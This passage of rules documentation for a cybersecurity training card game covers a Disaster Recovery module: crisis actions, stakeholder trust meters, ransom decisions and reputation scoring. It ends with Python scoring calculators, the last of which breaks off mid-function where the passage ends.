Budget Range: 10 (BASIC) to 25 (ELITE)
Distribution: 4 BASIC (D-25, D-31, D-34, D-41), 8 ADVANCED (D-26, D-28, D-29, D-32, D-35, D-37, D-38, D-42), 7 ELITE (D-27, D-30, D-33, D-36, D-39, D-40, D-43)
Setup:
- 5-card threat chain (mix of base + expansion threats)
- Starting Budget: 120
- Turn Limit: 11 [(5 × 2) + 1, per core rules §3a]

Incident Response Attack Chain Example:
1. Compromised Software Vendor Update (T-13) → MALWARE
2. Lateral Movement via SMB (T-04) → NETWORK
3. Cloud API Token Theft (T-18) → CREDENTIAL ABUSE
4. Disgruntled Employee Sabotage (T-16) → MALWARE
5. Data Exfiltration (T-19: DNS Tunneling) → DATA EXFIL

Incident Response Recommended Defense Starting Hand:
- D-31: Container Image Scanning (10)
- D-28: Baseline Behavior Learning System (15)
- D-34: Cloud Configuration Auditing (10)
- D-35: Cloud Access & Permission Auditing (15)
- D-37: Playbook: Ransomware Response (15) - reusable

Hardening Strategy:
- Deploy D-32, D-33 for container security
- Deploy D-36 for cloud audit trails
- Deploy D-30 for insider threat detection
- Prepare D-39 playbook for insider coordination

Pentester Tactics to Draw (Hardening):
1. PT-07: Supply Chain Compromise (countered by D-31, D-40)
2. PT-02: Malware Evasion - Living-off-the-Land (countered by D-27, D-30)
3. PT-09: Multi-Vector Attack, expansion (countered by D-33, D-35)
Total Threats: 20
Base Defense Cards: 24
Recommended Play: Use subsets based on experience level
- Beginners: Base deck only
- Intermediate: Base + 4 expansion threats (choose scenario)
- Advanced: Base + all expansion cards
Expansion Defense Card Set for Incident Zero
Use these cards to add modern security controls to your game
For integration guides and teaching notes, see above sections
docs/rules/module-disaster-recovery.md
Version: 2.2 - Playtest Edition
Last Updated: October 2025
v2.2: the card system is canonical. The Disaster Recovery game is played with 12 Crisis Action cards (plus ACTION-13), 12 Event cards, and 5 Stakeholder cards. Track advances are deterministic — dice are used only for the optional Justification bonus and ACTION-13's "no guarantee" roll. See cards/disaster-recovery/ for the cards themselves and v2.2 Playtest Edition Changes at the bottom of this document for what changed.
The Disaster Recovery Module teaches crisis management and breach response when incident detection fails. This module is typically entered after losing an Incident Response module (representing an undetected or uncontained breach) but can also be played standalone to teach DR concepts.
This is not a "second chance" to solve the attack chain. Instead, it simulates the real-world consequences of a successful breach:
- Crisis management under pressure
- Stakeholder communication (board, customers, regulators)
- Forensic investigation with limited budget
- Public disclosure and legal requirements
- Incident containment and damage assessment
- Financial impact and recovery costs

- Incident Response: Teaches proactive threat detection and investigation
- Hardening (typically after an IR win): Teaches proactive defense and resilience
- Disaster Recovery (typically after an IR loss): Teaches crisis management, consequences, and recovery
| Component | Count | Purpose |
|---|---|---|
| Crisis Action cards (ACTION-01 to ACTION-13) | 13 | The actions teams play each turn |
| Event cards (EVENT-01 to EVENT-12) | 12 | 6 Scheduled + 6 Triggered pressure events |
| Stakeholder cards (STAKE-01 to STAKE-05) | 5 | Five trust meters (0-100%) |
| Progress tracks | 3 | Investigation %, Remediation %, Communication % (0-100%) |
| d20 | 1 | Optional Justification bonus; ACTION-13 "no guarantee" roll |
| Track/trust sheets | — | See print pack (coming) — a piece of paper works fine |
Money mapping: 1 Budget ≈ $50K. All dollar figures (fines, ransoms) use this mapping unless marked narrative-only.
Trigger: Team lost the Incident Response module by either:
- Reaching Turn 10 with unrevealed cards remaining, OR
- Running out of Budget (reaching 0)
Outcome: The attack chain proceeded undetected. The threat actor succeeded.
(Standalone play: skip Incident Response and start here — see the standalone guide.)
The Threat Orchestrator reveals the entire unrevealed attack chain to the Blue Team:
- All hidden Threat cards are shown
- The complete attack progression is explained
- The attacker's objectives are stated

Example Revelation:

"Your security team was unable to detect the attack in time. The attacker successfully:
1. Sent a phishing email (SOCIAL ENGINEERING)
2. Harvested credentials (CREDENTIAL ABUSE)
3. Moved laterally across your network (NETWORK)
4. Dumped admin credentials (CREDENTIAL ABUSE)
5. Exfiltrated your entire customer database (DATA EXFIL)

The attacker is now threatening to publish the data unless you pay $1M (20 Budget). You have 72 hours before regulators must be notified."
Budget floor is 0. Budget can never go negative; the free Holding Statement action is always available.
Set the three progress tracks to 0%: Investigation, Remediation, Communication.
Set the five stakeholder trust meters to their starting values: Customers 50%, Regulators 60%, Media 40%, Board 70%, Executives 80%. Meters clamp to 0-100%.
Build the Event Timeline: place the 6 Scheduled events on their turns (EVENT-01 Turn 2, EVENT-04 Turn 3, EVENT-03 + EVENT-09 Turn 5, EVENT-02 Turn 6, EVENT-12 Turn 7). Lay the 6 Triggered events face-up where their conditions can be read.
Ransom scenarios: note the ransom deadline (default: start of Turn 5) and put ACTION-13 where the team can see it.
Reputation is NOT tracked during play. It is computed once, at game end (see Final Scoring). During play, the three tracks and five trust meters are the whole state.
The game lasts 8 turns. Each turn is one crisis phase of ~6-12 hours of narrative time:
| Turn | Narrative Time | Key Deadline |
|---|---|---|
| 1 | Detection +6h | Internal discovery |
| 2 | +12h | Internal legal/executive escalation complete (narrative; this was mislabeled a "regulatory deadline" in v2.1 — the regulatory anchor is GDPR 72h) |
| 3 | +18h | Board Meeting (EVENT-04) |
| 4 | +24h | Day 1 ends |
| 5 | +36h | Customer notification recommended (ACTION-09); default ransom deadline (ACTION-13) |
| 6 | +48h | Regulatory escalation begins (EVENT-02): -10 Regulator trust per un-notified turn |
| 7 | +60h | Government subpoena (EVENT-12) |
| 8 | +72h | GDPR 72-hour deadline: ACTION-10 must be complete. Game ends. |
All deadlines on every card use this clock. There are no 12-hour, 24-hour, 30-day, or 60-day timers anymore; the former 30/60-day deadlines are deferred final-scoring consequences (see Final Scoring).
(Exception: EVENT-08 Second Breach extends play to Turn 10, once per game. Scoring deadlines do not move.)
Each turn:
1. START OF TURN
   - Complete any in-flight multi-turn action that finishes now (apply its track advance)
   - Reveal and resolve this turn's Scheduled event
   - Check all un-fired Triggered events; resolve any whose condition is met
   - Apply decay/deadline penalties (e.g., Customer decay, Regulator -10/turn from Turn 6 if un-notified)
2. TEAM ACTION (2-3 minutes discussion)
   - Play ONE Crisis Action card: pay its Budget cost, apply its track advance
   - Multi-turn actions (Duration N): the card occupies your action slot only on the turn started; its advance completes at the start of the Nth following turn. Only one multi-turn action in flight at a time.
   - Or take the free Holding Statement (0 Budget, +5% Communication; always available, counts as a Communication action for decay purposes)
   - Optional Justification bonus (v2.2): if the team gives a strong, specific technical justification for the action, the TO may allow a d20 roll — on 11+, that action's track advance gains +5%. This is the only d20 in track advancement, and it is a bonus, never a gate.
   - ACTION-13 (Ransom Decision) may be declared at any time before the ransom deadline; it does not use the action slot and happens once per game.
3. APPLY STAKEHOLDER EFFECTS
   - Apply the played action's trust effects (table below)
4. END OF TURN
   - Check the loss condition: any stakeholder trust at 0% = immediate loss ("the company collapses")
   - Advance the turn counter
| Action | Trust effects when completed |
|---|---|
| ACTION-01 Forensic Analysis | Regulators +10, Board +5 |
| ACTION-02 Threat Hunting | — |
| ACTION-03 Log Analysis | — |
| ACTION-04 Third-Party IR | Regulators +15, Board +15 |
| ACTION-05 Patch & Harden | Executives +5 |
| ACTION-06 Containment | Executives +5 |
| ACTION-07 Rebuild from Backup | Executives +5, Customers +5, Board +5 |
| ACTION-08 Credential Reset | Executives +5 |
| ACTION-09 Customer Notification | Customers +15, Media +5 |
| ACTION-10 Regulatory Notification | Regulators +20 |
| ACTION-11 Media Management | Media +20, Customers +10 |
| ACTION-12 Board Communication | Board +20, Executives +5 |
| ACTION-13 Ransom Decision | — (scoring effects only) |
| Holding Statement (free) | — (stops Customer decay) |
Where a Stakeholder card lists a range (e.g., "+2-5%"), this table is the single authoritative value (v2.2).
| Deadline | Turn | If missed |
|---|---|---|
| Internal legal/executive escalation | End of Turn 2 | Narrative only |
| Customer notification (ACTION-09) | End of Turn 5 (recommended) | Customer trust -10 per later turn; EVENT-05 Class Action may trigger; never notified = -15 Reputation at final scoring |
| Ransom decision (ACTION-13) | Start of Turn 5 (default; +2 turns if NEGOTIATE) | Treated as REFUSE; data-publication event fires |
| Regulatory notification (ACTION-10) — GDPR 72h | End of Turn 8 (escalating from Turn 6) | Regulator trust -10 per turn from Turn 6 while un-notified; never notified = -20 Reputation at final scoring (deferred fine) |
If the scenario includes a ransom/extortion demand, the team must resolve ACTION-13: Ransom Decision before the ransom deadline (default: start of Turn 5). Exactly one option, once per game:
| Option | Cost | Reputation (at scoring) | Effect |
|---|---|---|---|
| PAY | 20 Budget (≈ $1M) | -15 | Data-publication event skipped/cancelled; +20% Remediation immediately. No guarantee: TO rolls d20 — on 1-5 the keys don't work: no refund, +0% Remediation (publication stays cancelled). |
| NEGOTIATE | 5 Budget | -5 | Data-publication event delayed by 2 turns (default: to start of Turn 7). |
| REFUSE | 0 Budget | 0 (-20 if the data-publication event later triggers) | No payment, no delay. |
Data-publication event: if the team has not PAID by the (possibly delayed) deadline, the attacker publishes the stolen data: Customer trust -20, Media trust -15, plus the REFUSE scoring penalty if applicable.
Corrected facts (v2.2): payment may violate OFAC sanctions if the threat actor is sanctioned; many insurers restrict or exclude ransom coverage. The FBI discourages payment. Payment guarantees nothing.
Decision Framework for Teams:
- Small company, limited budget: may pay (can't afford extended downtime)
- Large company, security-conscious: often refuses (sets precedent, funds crime)
- Critical infrastructure: may negotiate with government assistance
- Regulated industry / sanctioned actor: payment may be legally impossible
Educational Purpose: the ethical and practical considerations of ransom decisions; no "right" answer — it depends on risk tolerance.
Immediate Costs (paid from DR Budget, floor 0):
- Crisis Action card costs (see the Crisis Action deck)
- Event costs (subpoena legal fees, regulatory fine, lost revenue)
- Ransom payment or negotiation (ACTION-13)

Deferred/Ongoing Costs (narrative-only; discuss in debrief):
- Credit monitoring, legal costs, long-tail regulatory exposure, customer churn
- Real-world scale: GDPR fines run up to €20M or 4% of global turnover, whichever is higher; total breach costs typically run to millions
The scoring system captures deferred consequences as Reputation penalties (below) rather than as a parallel money ledger.
Reputation is computed once, at game end. The three tracks and five trust meters drive play; Reputation (0-100) is the outcome measure.
FINAL REPUTATION = 100, then apply:

1. TRACK RESULTS (per track: Investigation, Remediation, Communication)
   - 50-100% → -0
   - 25-49% → -5
   - 10-24% → -10
   - 0-9% → -20
2. STAKEHOLDER TRUST (average of the five meters at game end)
   - 70%+ → +5
   - 50-69% → 0
   - 30-49% → -10
   - below 30% → -20
3. DECISION & EVENT MODIFIERS (each applies at most once)
   - +5 Customers notified transparently by end of Turn 5 (ACTION-09)
   - +3 per completed quality investigation (ACTION-01 or ACTION-04), MAX +6 total per game
   - -5 ACTION-13 NEGOTIATE (only one ACTION-13 modifier can apply)
   - -15 ACTION-13 PAY (only one ACTION-13 modifier can apply)
   - -20 ACTION-13 REFUSE and data was published
   - -10 EVENT-05 Class Action triggered
   - -10 EVENT-06 Regulatory Fine triggered
   - -10 EVENT-08 Second Breach triggered
   - -15 Customers never notified in-game (deferred statutory violation)
   - -20 Regulators never notified in-game (deferred GDPR fine)
4. CLAMP the result to 0-100.
| Final Reputation | Outcome | Interpretation |
|---|---|---|
| 85-100 | Exemplary | Crisis well-managed; stakeholder trust preserved; the organization recovers |
| 70-84 | Managed | Adequate response; some damage; recovery likely |
| 55-69 | Damaged | Poor response; significant customer loss; regulatory scrutiny; recovery uncertain |
| 40-54 | Mismanaged | Major reputational/financial damage; leadership changes likely |
| Below 40 | Catastrophic | Company survival in question; CEO likely replaced |
Below 20% trust is a CRITICAL warning state only — it triggers escalation events but is never itself a loss. The old "<30% trust = loss" rule is removed.
Default: the Reputation computation starts at 100 for every game. As a clearly-labelled optional difficulty variant, start the computation lower for bigger breaches:
| Scope | Records | Start computation at |
|---|---|---|
| Small (Beginner) | ~50K | 100 (default) |
| Medium (Intermediate) | ~500K | 90 |
| Large (Advanced) | 5M+ | 80 |
Scenario: "The Ransomware Nightmare" — customer database encrypted and exfiltrated (500K records), ransom demand $1M (20 Budget), publication threatened. Standalone play, default difficulty. Budget 50.
| Turn | Action (cost) | Tracks | Events & trust |
|---|---|---|---|
| 1 | ACTION-02 Threat Hunting (8); justification roll 14 → +5% | Inv 20 | — |
| 2 | ACTION-06 Containment (8) | Rem 15 | EVENT-01: no media action yet → Media 40→30. Exec +5 → 85 |
| 3 | ACTION-10 Notify Regulators (8); declare ACTION-13 NEGOTIATE (5) | Comm 10 | Customer decay (no Communication action completed yet at start of turn): Customers 50→40. Regulators 60→80. EVENT-04 unprepared (no ACTION-12) → Board 70→50. Publication delayed to start of Turn 7 |
| 4 | ACTION-05 Patch & Harden (10) | Rem 35 | No more decay (ACTION-10 completed). Exec +5 → 90 |
| 5 | ACTION-09 Customer Notification (10) | Comm 30 | Customers 40→55, Media 30→35. EVENT-03 passed → +5 Rep at scoring. (Private company: skip EVENT-09) |
| 6 | Holding Statement (0) | Comm 35 | EVENT-02: already notified → Regulators +5 → 85. EVENT-08 check: Rem 35 ≥ 30 → does not fire |
| 7 | Holding Statement (0) | Comm 40 | Data published (unpaid): Customers 55→35, Media 35→20. EVENT-12: Exec 90→80, Budget 1→0, Inv +5% → 25 |
| 8 | Holding Statement (0) | Comm 45 | Media at 20 (not below 20) → EVENT-07 does not fire. Game ends |
Budget spent: 8+8+8+5+10+10 = 49 of 50 (then -5 subpoena fees, floored at 0).
Final state: Tracks: Inv 25, Rem 35, Comm 45. Trust: Customers 35, Regulators 85, Media 20, Board 50, Executives 80 → average 54.
Scoring:
- Tracks: Inv 25 (-5), Rem 35 (-5), Comm 45 (-5) → -15
- Trust average 54 → 0
- Modifiers: +5 (transparent customer notification by Turn 5), -5 (NEGOTIATE) → 0
- Final Reputation: 100 - 15 = 85 → Exemplary (barely!)
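The Final Reputation rubric as a small calculator, checked against this walkthrough's end state. This is an added example, not part of the game's own materials; the function and argument names are invented for the illustration.

```python
"""Final Reputation calculator for the Disaster Recovery module (v2.2 rubric).
Added example: the function and argument names here are invented, not the game's."""
from typing import Dict, List, Optional, Set, Tuple

TRACK_TABLE = [(50, 0), (25, -5), (10, -10), (0, -20)]   # Step 1: per-track penalty
TRUST_TABLE = [(70, 5), (50, 0), (30, -10), (0, -20)]    # Step 2: average-trust modifier
TIER_TABLE = [(85, "Exemplary"), (70, "Managed"), (55, "Damaged"),
              (40, "Mismanaged"), (0, "Catastrophic")]   # Outcome table


def lookup(value: float, table):
    """Result of the first row whose threshold `value` reaches (rows run high to low)."""
    return next(result for threshold, result in table if value >= threshold)


def track_penalty(pct: int) -> int:
    return lookup(pct, TRACK_TABLE)


def trust_modifier(avg: float) -> int:
    return lookup(avg, TRUST_TABLE)


def outcome_tier(score: int) -> str:
    return lookup(score, TIER_TABLE)


def decision_modifiers(
    customers_notified_by_turn5: bool = False,
    quality_investigations: int = 0,          # completed ACTION-01 / ACTION-04
    ransom_decision: Optional[str] = None,    # "PAY", "NEGOTIATE", "REFUSE" or None
    data_published: bool = False,
    events_triggered: Optional[Set[str]] = None,
    customers_notified: bool = True,
    regulators_notified: bool = True,
) -> List[Tuple[str, int]]:
    """Step 3: each modifier applies at most once; only one ACTION-13 line can apply."""
    events = events_triggered or set()
    mods: List[Tuple[str, int]] = []
    if customers_notified_by_turn5:
        mods.append(("ACTION-09 by end of Turn 5", 5))
    inv_bonus = min(3 * quality_investigations, 6)  # +3 each, MAX +6 per game
    if inv_bonus:
        mods.append(("quality investigations", inv_bonus))
    if ransom_decision == "NEGOTIATE":
        mods.append(("ACTION-13 NEGOTIATE", -5))
    elif ransom_decision == "PAY":
        mods.append(("ACTION-13 PAY", -15))
    elif ransom_decision == "REFUSE" and data_published:
        mods.append(("ACTION-13 REFUSE, data published", -20))
    for event in ("EVENT-05", "EVENT-06", "EVENT-08"):
        if event in events:
            mods.append((event, -10))
    if not customers_notified:
        mods.append(("customers never notified", -15))
    if not regulators_notified:
        mods.append(("regulators never notified", -20))
    return mods


def final_reputation(tracks: Dict[str, int], trust: Dict[str, int],
                     start: int = 100, **decisions) -> Dict[str, object]:
    """Steps 1-4. `start` is 100 by default (90/80 under the difficulty variant)."""
    track_total = sum(track_penalty(p) for p in tracks.values())
    avg = sum(trust.values()) / len(trust)
    trust_mod = trust_modifier(avg)
    mods = decision_modifiers(**decisions)
    raw = start + track_total + trust_mod + sum(m for _, m in mods)
    score = max(0, min(100, raw))  # Step 4: clamp to 0-100
    return {"score": score, "tier": outcome_tier(score), "track_penalty": track_total,
            "trust_average": avg, "trust_modifier": trust_mod, "modifiers": mods}


def worked_example(start: int = 100) -> Dict[str, object]:
    """End state of 'The Ransomware Nightmare' walkthrough: expected 85, Exemplary."""
    return final_reputation(
        tracks={"Investigation": 25, "Remediation": 35, "Communication": 45},
        trust={"Customers": 35, "Regulators": 85, "Media": 20, "Board": 50, "Executives": 80},
        start=start,
        customers_notified_by_turn5=True,  # ACTION-09 played on Turn 5
        ransom_decision="NEGOTIATE",       # declared Turn 3; publication still fired Turn 7
        data_published=True,               # no -20: that penalty is for REFUSE only
    )
```

Re-running the same end state with `start=80` (the Large-breach variant) drops the result to 65, a "Damaged" game, which is the difficulty table's intended effect.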
Lessons visible in the example: the team skipped board prep (Board Meeting hurt), never bought media management (publication nearly triggered a frenzy at Media 20), and threading the ransom deadline with NEGOTIATE bought exactly enough time to notify everyone first. One different choice and this is a 70s game.
Mandatory-path check (v2.2): the cheapest mandatory beats — investigate (ACTION-03: 5), notify regulators (ACTION-10: 8), notify customers (ACTION-09: 10), remediate (ACTION-08: 6) — cost 29 Budget. A stronger path (ACTION-02 + ACTION-10 + ACTION-09 + ACTION-05 + ACTION-06) costs 44. Both fit a 50-Budget team with room for events.
See the worked example above. Key tension: ransom decision vs. notification deadlines.
Attack chain revealed: disgruntled employee → lateral movement → Mimikatz → insider data theft. Data already for sale on dark web (no ransom demand — skip ACTION-13).
Suggested line of play (Budget 50-60):
1. Turn 1: ACTION-03 Log Analysis (5) — establish the insider's access timeline
2. Turn 2: ACTION-01 Forensic Analysis (12, Duration 2) — evidence for HR/legal/prosecution
3. Turn 3: ACTION-10 Regulatory/Law-Enforcement Notification (8) — FBI referral
4. Turn 4: (forensics completes: +25% Inv, +3 at scoring) ACTION-08 Credential Reset (6)
5. Turn 5: ACTION-09 Customer Notification (10) — transparent disclosure
6. Turns 6-8: ACTION-06 Containment (8), then Holding Statements
Teaching point: insider threats hit Executive and Board trust hardest; internal communication matters as much as external.
Attack chain revealed: compromised vendor update → lateral movement → cloud API token theft → DNS tunneling exfiltration → persistent C2.
Teaching point: teams quickly realize they cannot finish remediation by Turn 8 — ACTION-07 rebuilds and ACTION-04 third-party IR eat the clock and the budget. That is the lesson: some incidents transition to months-long response. Expect a "Damaged"-tier result even from good play, and debrief why (complex incidents score lower on the same rubric).
After DR Phase completion, run a structured debrief:
Incident Response Skills:
- Prioritize crisis response actions under pressure
- Coordinate across teams and stakeholders
- Make decisions with incomplete information
- Understand forensic investigation requirements

Business Impact Understanding:
- Recognize financial costs of breaches (not just immediate costs)
- Understand regulatory & legal consequences
- Learn about reputational damage and customer churn
- Recognize insurance and recovery programs

Stakeholder Management:
- Communicate effectively with diverse audiences (customers, regulators, media)
- Balance transparency with liability reduction
- Manage expectations during crisis
- Follow regulatory notification requirements (the GDPR 72-hour anchor)

Long-term Recovery:
- Incident doesn't end when systems are "fixed"
- Organizational recovery takes months/years
- Prevention is far cheaper than response
- Importance of pre-incident preparation

For Teams That Had Better Detection (Lost Incident Response by Turn 9-10):
- "If you'd detected the attack one turn earlier, what would have changed?"
- "What one additional control would have triggered detection?"
- "How does dwell time (time from compromise to detection) affect these costs?"

For Teams That Lost Quickly (Out of budget by Turn 5-6):
- "Why did your investigation fail so quickly?"
- "Which budget-saving action actually cost you more in the long run?"
- "What would aggressive early investigation have prevented?"

For All Teams:
- "How much did this incident actually cost (total financial + reputational)?"
- "If detection during Incident Response saves 80% of these costs, what should you invest in detection?"
- "How would a pre-prepared incident response plan have helped?"
- "What's the value of having a Disaster Recovery plan before you need it?"

Average Breach Costs (2023 data; narrative-only):
- Detection Time (Dwell Time): 206 days average
- Cost per Compromised Record: $4.50 (varies by industry)
- Total Average Cost: $4.5M (for 1M records)
- Cost Breakdown: Detection & Analysis 25%, Containment & Eradication 20%, Recovery & Restoration 20%, Legal & Regulatory 15%, PR & Communications 10%, Customer Notifications 10%

Common Mistakes in Real Incidents:
- Poor forensic planning → Extended investigation costs
- Late customer notification → Regulatory fines + brand damage
- Inadequate remediation → Re-compromise (in-game: EVENT-08)
- Ransom payment → Funds future attacks; doesn't guarantee data deletion
- No incident plan → Chaos and poor decisions

Success Factors in Real Incidents:
- Pre-incident planning and training
- Clear communication protocols
- Rapid forensic investigation
- Transparent customer communication
- Thorough remediation
- Post-incident review and improvements
If a team scores 85+ (Exemplary), they can attempt a post-game Recovery Analysis: spend 5 remaining Budget for a deep forensic review, identify the systemic failure that allowed the Incident Response loss, and describe the detection investment that would have caught it. Models "turning crisis into opportunity."
Disaster Recovery doesn't necessarily end the incident: Week 2 threat hunting discovers a backdoor still active; Week 4 the attacker tries again; Week 8 a new variant appears. Replay DR with the Second Breach event pre-armed. Teams learn that some breaches have long tails.
Add negotiation flavor at debrief: Did the insurer cover this incident? (Many policies restrict or exclude ransom coverage.) How much forensic evidence was preserved for lawsuits? Could you have negotiated the regulatory settlement?
- Incident Response teaches: "Catch attacks early"
- Hardening (after a win) teaches: "Prevent future attacks"
- Disaster Recovery (after a loss) teaches: "Plan for what you'll miss"

Together, they create a complete incident response curriculum:
1. Detection & Investigation (Incident Response)
2. Hardening & Prevention (Hardening — win path)
3. Crisis Management & Recovery (Disaster Recovery — loss path)
Students learn that even with perfect security, breaches can happen. The question isn't "Will we be attacked?" but "When we're attacked, will we respond effectively?"
Disaster Recovery Phase for Incident Zero
For teams that experience the cost of failed detection
Emphasizing that response quality matters as much as prevention
docs/standalone-games/disaster-recovery.md
Version: 2.2 - Playtest Edition
Duration: 30-45 minutes
Players: 1 Threat Orchestrator + 2-4 Blue Team members
Best For: Crisis management training, incident response procedures, stakeholder communication
v2.2: the card system is canonical. You play the 13 Crisis Action cards against the 12 Event cards while managing 5 Stakeholder trust meters, over one 8-turn clock. Track advances are deterministic; dice appear only in the optional Justification bonus and ACTION-13's "no guarantee" roll. This guide uses the exact same rules, numbers, and tier table as docs/rules/module-disaster-recovery.md.
The Disaster Recovery Module teaches players how to manage a real breach — investigation, remediation, stakeholder communication, and the ransom decision — under extreme time and budget pressure.
Players balance three progress tracks (Investigation %, Remediation %, Communication %) and five stakeholder trust meters while an event timeline turns up the heat. At the end, a single Reputation score (0-100) is computed from what they achieved.
From cards/disaster-recovery/:
- 13 Crisis Action cards (ACTION-01 to ACTION-13)
- 12 Event cards (6 Scheduled + 6 Triggered)
- 5 Stakeholder cards (trust meters)
- A d20, and paper for the tracks/trust/budget (tracker sheets: see print pack, coming)
Money mapping: 1 Budget ≈ $50K.
The breach has already succeeded. The Threat Orchestrator reveals the full attack chain:

"Your organization has experienced a significant data breach. Here's what happened:

Attack Chain:
1. Phishing Campaign → Employee clicked malicious link
2. Credential Harvesting → Login credentials captured
3. VPN Access → Attacker gained network access
4. Lateral Movement → Access to production servers
5. Database Exfiltration → 500,000+ customer records stolen

Current Status:
- Breach detected; the crisis clock starts now
- Attacker demanding $1M ransom (= 20 Budget) or they publish the data
- Media starting to ask questions
- You have 8 turns (72 narrative hours) to respond

Your Challenge: Investigate the breach, remediate it, and communicate with stakeholders — before the deadlines land."
| Turn | Time | Scheduled Event / Deadline |
|---|---|---|
| 1 | +6h | Internal discovery |
| 2 | +12h | EVENT-01 First Media Coverage; internal legal/executive escalation complete (narrative) |
| 3 | +18h | EVENT-04 Board Meeting |
| 4 | +24h | — |
| 5 | +36h | EVENT-03 Customer Notification Window (ACTION-09 recommended by end of this turn); EVENT-09 Shareholder Pressure (public companies); default ransom deadline (ACTION-13) |
| 6 | +48h | EVENT-02 Regulatory 72h Deadline — escalation begins (-10 Regulator trust per un-notified turn) |
| 7 | +60h | EVENT-12 Government Subpoena (medium/large breaches) |
| 8 | +72h | GDPR 72-hour deadline: ACTION-10 must be complete. Game ends. |
Lay the 6 Triggered events (EVENT-05, -06, -07, -08, -10, -11) face-up where their trigger conditions can be read. Each fires once, when its condition is met.
Default: the final Reputation computation starts at 100. For harder games:
| Scope | Records | Start computation at |
|---|---|---|
| Small (Beginner) | ~50K | 100 (default) |
| Medium (Intermediate) | ~500K | 90 |
| Large (Advanced) | 5M+ | 80 |
1. START OF TURN
   - Complete any in-flight multi-turn action that finishes now (apply its track advance)
   - Resolve this turn's Scheduled event; check all un-fired Triggered events
   - Apply decay/deadline penalties (Customer decay from Turn 3 if no communication yet; Regulator -10/turn from Turn 6 if un-notified)
   - Announce remaining Budget, tracks, and trust meters
2. BLUE TEAM'S TURN (2-3 minutes discussion)
   - Play ONE Crisis Action card: pay its cost, apply its track advance — or take the free Holding Statement (0 Budget, +5% Communication)
   - Multi-turn actions (Duration N): occupy the action slot only on the turn started; the advance completes at the start of the Nth following turn; one in flight at a time
   - Justification bonus (optional): strong, specific technical justification → roll d20; on 11+ that action's advance gains +5%
   - ACTION-13 Ransom Decision may be declared at any time before the ransom deadline; it does not use the action slot (once per game)
3. APPLY STAKEHOLDER EFFECTS
   - Apply the action's trust effects (table below)
4. END OF TURN
   - Any stakeholder trust at 0% = immediate loss ("the company collapses")
   - Advance the turn counter; the game ends after Turn 8 (Turn 10 if EVENT-08 fired)
| Card | Category | Cost | Advance | Duration | Trust effects |
|---|---|---|---|---|---|
| ACTION-01 Forensic Analysis | Investigation | 12 | +25% Inv | 2 turns | Regulators +10, Board +5 |
| ACTION-02 Threat Hunting | Investigation | 8 | +15% Inv | 1 turn | — |
| ACTION-03 Log Analysis | Investigation | 5 | +10% Inv | 1 turn | — |
| ACTION-04 Third-Party IR | Investigation | 20 | +30% Inv, +20% Rem | 3 turns | Regulators +15, Board +15 |
| ACTION-05 Patch & Harden | Remediation | 10 | +20% Rem | 1 turn | Executives +5 |
| ACTION-06 Containment | Remediation | 8 | +15% Rem | 1 turn | Executives +5 |
| ACTION-07 Rebuild from Backup | Remediation | 15 | +25% Rem | 2 turns | Exec +5, Cust +5, Board +5 |
| ACTION-08 Credential Reset | Remediation | 6 | +12% Rem | 1 turn | Executives +5 |
| ACTION-09 Customer Notification | Communication | 10 | +20% Comm | 1 turn | Customers +15, Media +5 |
| ACTION-10 Regulatory Notification | Communication | 8 | +10% Comm | 1 turn | Regulators +20 |
| ACTION-11 Media Management | Communication | 12 | +15% Comm | 1 turn | Media +20, Customers +10 |
| ACTION-12 Board Communication | Communication | 9 | +12% Comm | 1 turn | Board +20, Executives +5 |
| ACTION-13 Ransom Decision | Crisis Decision | 0/5/20 | Pay: +20% Rem | Instant | — (scoring only) |
| Holding Statement (free rule) | Communication | 0 | +5% Comm | 1 turn | — (stops Customer decay) |
Declare before the ransom deadline (default: start of Turn 5). One option, once per game:
Data-publication event: if the team has not PAID by the (possibly delayed) deadline: Customer trust -20, Media trust -15, plus the REFUSE penalty if applicable.
Facts: payment may violate OFAC sanctions if the actor is sanctioned; many insurers restrict or exclude ransom coverage; the FBI discourages payment; payment guarantees nothing.
At game end, compute Reputation:
FINAL REPUTATION = 100 (or 90/80 with the scope variant), then apply:
1. TRACK RESULTS (per track: Investigation, Remediation, Communication)
50-100% -> -0 | 25-49% -> -5 | 10-24% -> -10 | 0-9% -> -20
2. STAKEHOLDER TRUST (average of the five meters)
70%+ -> +5 | 50-69% -> 0 | 30-49% -> -10 | below 30% -> -20
3. DECISION & EVENT MODIFIERS (each at most once)
+5 Customers notified transparently by end of Turn 5
+3 per quality investigation completed (ACTION-01 or ACTION-04), MAX +6 per game
-5 / -15 / -20 ACTION-13: Negotiate / Pay / Refuse-and-published
-10 each: EVENT-05 Class Action, EVENT-06 Regulatory Fine, EVENT-08 Second Breach
-15 customers never notified in-game
-20 regulators never notified in-game
4. CLAMP to 0-100.
Worked example: see the module rules (docs/rules/module-disaster-recovery.md) — a 50-Budget team runs ACTION-02, -06, -10, NEGOTIATE, -05, -09 plus Holding Statements and finishes Inv 25 / Rem 35 / Comm 45, trust average 54 → Reputation 85.
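The four scoring steps as runnable code, added here as a worked example (it is not code from the Incident Zero project). It implements the track penalties, the trust-average modifier, the decision and event modifiers and the final clamp exactly as printed above, plus the outcome tier table, and reproduces the 85-point example from the module rules. `ScoreInputs`, `final_reputation` and `outcome_tier` are names chosen for this example; the five trust meters in `worked_example` are constructed values chosen to average 54, since the rules only state the average.

```python
"""Final Reputation scoring for the Disaster Recovery module (added example)."""
from dataclasses import dataclass


def track_penalty(pct: int) -> int:
    """Step 1: penalty for one track (Investigation, Remediation or Communication)."""
    if pct >= 50:
        return 0
    if pct >= 25:
        return -5
    if pct >= 10:
        return -10
    return -20


def trust_modifier(avg_trust: float) -> int:
    """Step 2: modifier from the average of the five stakeholder meters."""
    if avg_trust >= 70:
        return 5
    if avg_trust >= 50:
        return 0
    if avg_trust >= 30:
        return -10
    return -20


@dataclass
class ScoreInputs:
    investigation: int                 # final track percentages, 0-100
    remediation: int
    communication: int
    trust_meters: dict                 # five stakeholder meters, each 0-100
    start: int = 100                   # 90 / 80 with the scope variant
    customers_notified_by_turn5: bool = False
    customers_notified: bool = False   # ACTION-09 completed at any point in-game
    regulators_notified: bool = False  # ACTION-10 completed at any point in-game
    quality_investigations: int = 0    # completed ACTION-01 / ACTION-04 (capped at +6)
    ransom: str = "NONE"               # NONE, NEGOTIATE, PAY or REFUSE
    data_published: bool = False       # the data-publication event fired
    events_fired: tuple = ()           # e.g. ("EVENT-05", "EVENT-08")


def final_reputation(s: ScoreInputs) -> int:
    score = s.start
    # Step 1: track results
    for pct in (s.investigation, s.remediation, s.communication):
        score += track_penalty(pct)
    # Step 2: stakeholder trust (average of the five meters)
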